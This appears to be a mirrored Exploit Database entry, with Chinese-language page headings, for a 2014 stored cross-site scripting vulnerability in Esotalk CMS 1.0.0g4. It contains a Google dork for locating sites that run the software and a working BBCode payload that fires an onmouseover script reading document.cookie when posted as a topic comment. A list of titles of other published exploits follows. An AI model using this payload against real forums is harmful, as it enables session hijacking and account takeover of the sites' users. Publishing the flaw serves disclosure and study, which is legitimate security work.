Esotalk CMS 1.0.0g4 – Cross-Site Scripting

Exploit Database
1664 阅读

作者： evi1m0

日期： 2014-11-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35138/

/******************************************************
# Exploit Title: esotalk cms topics xss vulnerability 
# Google Dork: powered by esotalk
# Date: 2014-11-01
# Vul Author: Evi1m0#ff0000team
# Vul Advisory: http://www.hackersoul.com/post/ff0000-hsdb-0006.html
# Vendor Homepage: http://esotalk.org/
# Software Link: http://esotalk.org/download 
# Tested on: Linux / Windows 
******************************************************/
 
esotalk cms topics xss vulnerability. The worst is at the topic page, Submit Comment:
 
Payload:

[url=[img]onmouseover=alert(document.cookie);//://hackersoul.com/image.jpg#"aaaaaa[/img]]evi1m0#knownsec[/url]

 
You see an alert. 

Proof img url: http://www.hackersoul.com/img/media/37D2E7A3-8A88-4CE2-9E3E-E2.jpg

last Exploits
Esotalk CMS 1.0.0g4 – Cross-Site Scripting的更多信息

2DayBiz ybiz Network Community Script – SQL Injection / Cross-Site Scripting：
PDF Signer 3.0 – Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)：
RICOH MP C6003 Printer – Cross-Site Scripting：
Topsites Script 1.0 – Cross-Site Request Forgery / PHP Code Injection：
OpenEMR 5.0.1.7 – ‘fileName’ Path Traversal (Authenticated)：
Article Friendly – SQL Injection：
WordPress Plugin Appointment Booking Calendar 1.3.34 – CSV Injection：
Learning Management System 0.1 – Authentication Bypass：